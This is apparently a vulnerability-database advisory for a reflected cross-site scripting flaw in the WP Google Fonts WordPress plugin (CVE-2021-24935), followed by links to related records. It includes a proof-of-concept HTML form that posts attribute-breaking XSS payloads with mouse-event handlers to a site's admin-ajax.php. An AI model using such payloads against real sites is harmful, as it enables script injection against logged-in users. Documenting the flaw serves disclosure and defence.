Lucene search
JrXnmWPEX-ID:53702281-1BD5-4828-B7A4-9F81CF0B6BB6HistoryNov 03, 2021 - 12:00 a.m.
WP Google Fonts < 3.1.5 - Reflected Cross-Site Scripting
2021-11-0300:00:00
JrXnm
90
0.001 Low
EPSS
Percentile
30.0%
The plugin does not escape the googlefont_ajax_name and googlefont_ajax_family parameter of the googlefont_action AJAx action (available to any authenticated user) before outputing them in attributes, leading Reflected Cross-Site Scripting issues
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="googlefont_action" />
<input type="hidden" name="googlefont_ajax_name" value='" onmouseover=alert(/XSS-1/) t="' />
<input type="hidden" name="googlefont_ajax_family" value='"onmousemove=alert(/XSS-2/)//' />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
//form1.submit();
</script>
</html>
The XSS from the googlefont_ajax_name will be triggered when the mouse will be over any of the checkbox. The one from googlefont_ajax_family will be triggered only in section 1 and 4Related
cvelist
cvelist
CVE-2021-24935 WP Google Fonts < 3.1.5 - Reflected Cross-Site Scripting
2021-12-06 15:55:35
wpvulndb
wpvulndb
WP Google Fonts < 3.1.5 - Reflected Cross-Site Scripting
2021-11-03 00:00:00
nvd
nvd
CVE-2021-24935
2021-12-06 16:15:08
cve
cve
CVE-2021-24935
2021-12-06 16:15:08
prion
prion
Cross site scripting
2021-12-06 16:15:00
cnvd
cnvd
WordPress WP Google Fonts plugin cross-site scripting vulnerability
2021-12-09 00:00:00